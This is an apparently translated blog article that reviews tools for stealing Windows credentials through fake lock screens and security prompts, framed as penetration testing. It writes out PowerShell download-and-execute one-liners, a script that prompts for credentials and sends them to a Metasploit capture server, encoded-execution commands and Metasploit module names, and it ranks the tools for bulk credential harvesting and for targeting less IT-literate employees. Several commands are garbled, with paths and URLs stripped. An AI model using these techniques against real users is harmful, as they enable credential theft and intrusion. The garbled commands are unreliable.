Phishing Windows credentials

In the first quarter of 2020, the number of phishing attacks on users worldwide doubled compared to the same period in 2019, from 9% to 18%. Such data are provided by “Kaspersky Lab”.

In operating systems of the Windows family, it is normal for some programs and processes to request user credentials for authentication (for example, in Outlook) to elevate execution privileges (User Account Control) or simply to exit standby mode (Windows LockScreen). Mimicking this Windows behavior allows you to retrieve user credentials for later use in penetration testing. This article has compiled a digest of several common phishing programs for changing the lock screen.


Modern pentesting techniques are often based on the C # programming language, since programs in it can be executed through various frameworks (Cobalt Strike, Covenant, etc.)

1) Utility The FakeLogonScreen was developed Arris Huijgen in C # and it not only replaces the standard OS password entry screen, but does so using the standard screen parameters set in the system, which significantly increases the chances of not arousing suspicion in the user and successfully obtaining his login credentials.

FakeLogonScreen – Launch

FakeLogonScreen – lock screen

When entering a password on a fake login page, FakeLogonScreen will validate the credentials in AD or locally to accurately determine if the password was entered correctly. In the future, the password will be displayed in the pentester’s console.

FakeLogonScreen – Entering credentials

Also included in FakeLogonScreen is the second version of the executable file, which saves the captured credentials to the user.db file locally on the infected machine. This file can be viewed using the type command:

type C:UserstestTHUser3AppDataLocalMicrosoftuser.db

FakeLogonScreen – saving to user.db file

2) The program is similarly arranged SharpLockerdeveloped by Matt pickford… Once launched, it also replaces the original login screen.

SharpLocker – screen lock

Each character entered by the user is intercepted until the entire password is revealed. It should be noted, however, that this utility does not authenticate the password and will sniff whatever the user enters into the password field.

SharpLocker – password phishing

Power shell

Windows Security prompts for credentials are very common because software in a corporate environment may regularly require additional confirmation or re-authorization. Microsoft Outlook, for example, is one of the brightest representatives of such software, which constantly prompts users for domain credentials.

1. A utility that disguises itself as a request window from the Windows security side is called CredsLeaker… For its correct operation, a web server is required from which it will receive all the necessary files and where it will save user credentials, as well as the presence of PowerShell to send HTTP requests to its server. All commands in the future will be executed from the BAT file included in the composition.

CredsLeaker – HTTP Delivery

Before running the run.bat file, you need to make all the necessary changes to the configuration files of the utility. Once the run.bat file is launched, the user will see a Windows Security window asking for his credentials.

CredsLeaker – phishing window

The prompt window will disappear only if valid user credentials are entered. Domain, computer name, username and password will be saved in creds.txt file in the path below:


CredsLeaker – output to file creds.txt

2. Matt nelson developed PowerShell script, which brings up a window asking for Windows Security credentials, followed by checking their validity. This window also cannot be closed by the user until valid credentials are entered. This script can be executed remotely, and the entered credentials will be displayed in the console on the attacker’s machine:

 powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('')); Invoke-LoginPrompt

Invoke-LoginPrompt – remote call

Invoke-LoginPrompt – phishing window

3. In the composition Nishang framework also available PowerShell scriptwhich creates a fake user credentials prompt window.

Import-Module C:Invoke-CredentialsPhish.ps1

Invoke-CredentialsPhish – local challenge and phishing window

The generated window will contain information that confirmation of this action is required in the form of entering credentials. More experienced users in terms of information security may suspect that this window is caused by the launch of an application in the background, but not everyone in a corporate network can have this knowledge. The credentials the user enters in the dialog will be displayed in the console.

Invoke-CredentialsPhish – Output of collected data

This script can also be run remotely:

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('; Invoke-CredentialsPhish

Rob fuller in his blog described a user credential phishing attack using Metasploit and PowerShell. The Metasploit Framework includes modules that can capture user credentials from various protocols (FTP, SMB, HTTP, etc.). The following module is used to deploy a basic HTTP server with authentication:

use auxiliary/server/capture/http_basic

PowerShell is used to carry out a phishing attack on user credentials by generating a Windows Security prompt window and then transmitting the collected credentials to the HTTP server created earlier through Metasploit:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object$cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('');

Initially capturing credentials requires using UTF-16LE encoding followed by conversion to Base64:

cat popup.txt | iconv -t UTF-16LE
 cat popup.txt | iconv -t UTF-16LE | base64 -w0

Converting code to Base64

Executing the specified code, locally or remotely, causes the user to display an authorization request window, allegedly from Windows Security.

powershell.exe -ep bypass -enc  

Phishing credentials window

The Metasploit module will receive the credentials immediately upon input from the user.

Metasploit HTTP Server – Retrieving Credentials


The Metasploit Framework includes a module that can independently trigger a fake window asking for Windows Security authorization from almost any process in the system. For this module to work correctly, you need to specify a working meterpreter session and a process on behalf of which the fake Windows Security authorization request will be called.

use post/windows/gather/phish_windows_credentials

Metasploit Module – configuration

In this case, the * symbol tells the module to monitor all processes that are running on behalf of the system (NT Authority System), and to call a dialog box when a new process is launched on the system on behalf of the system.

Metasploit Module – monitoring for all processes

As soon as the new process starts, the user will be presented with a dialog box on behalf of this process with a request for authorization to allegedly confirm further work.

Metasploit Module – phishing window

As soon as the user enters credentials, they will immediately be displayed in the Metasploit console.

Metasploit Module – Retrieving Credentials

Also, this module can be configured to wait for the launch of a specific process.

Metasploit Module – Retrieving credentials via notepad.exe process


Lockphish is another utility that is capable of performing a phishing attack that spoofs the Windows login window. The login window template is stored on the PHP server and by default uses YouTube to redirect the user after entering the username and password.


LockPhish – launch

At this stage, you need to use social engineering to lure the user to the website where the lock screen files are located.

LockPhish – file download

Unlike all other utilities, the location of the elements on this lock screen may not be accurate, the authorization request will be displayed on behalf of the Administrator, and not on behalf of the current user account, and the lock window is externally styled as Windows 10 Lockscreen. All this in combination can greatly alert the user. This utility also does not have mechanisms for validating the entered password.

LockPhish – lock screen

After the user enters their credentials, they are redirected to the website.

LockPhish – redirect

The credentials will be displayed in the console.

LockPhish – Credentials Collected

The methods presented in the article will be effective if the penetration tester has already managed to gain a foothold in the system (get a stable entry point), but it is not possible to increase privileges or obtain user credentials in another way. When carrying out such phishing attacks, you should carefully select the target audience. The effectiveness will be many times higher if the target is the least IT-literate employees of the organization.

Brief verdict for all tested software

  • FakeLogonScreen. It looks as realistic as possible, while using the standard parameters set in the system. Knows how to validate the entered credentials. (The best choice)
  • SharpLocker. Does not perform authentication, standard windows wallpapers for LockScreen are used, the layout of the lockscreen itself goes slightly to the right, which may alert the user. (Not recommended for use if it is possible to apply FakeLogonScreen)
  • CredsLeaker. Ease of execution, generates an authentic window, but requires a web server to work. If you need to trigger one user at a time, then the presence of a web server is rather a minus, if you can run a script on all computers in the domain and massively “comb” the credentials, then a web server is definitely a plus. (Recommended for bulk collection of credentials)
  • Invoke-LoginPrompt. Ease of implementation, suitable for point use, the created window is styled for old or server versions of Windows. May raise suspicion in the user. (Recommended for use, but with caution)
  • Invoke-CredentialsPhish. Everything is the same as in the patient above.
  • Script by Rob Fuller. Integration with metasploit, the possibility of mass use, easy dances with a tambourine as a conversion. (Also great for bulk collection of credentials)
  • Metasploit phish_windows_credentials module. Full integration with Metasploit (the same module), the created window of the old version. (You can use it, but consider the victim’s IT literacy)
  • LockPhish. On the one hand – a crookedly laid out lockscreen, without authentication, and even without taking into account the current user (Always asks for a password from the Administrator). On the other hand, it is the only patient that can be triggered through a browser. Send the link to the victim and wait. (It is not recommended to use out of the box, however, if you know the username of a specific victim, then reconfigure from Adminnistrator to it and it will not be so bad. It may even work)

Even more materials in our blog on telegram. Subscribe!

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *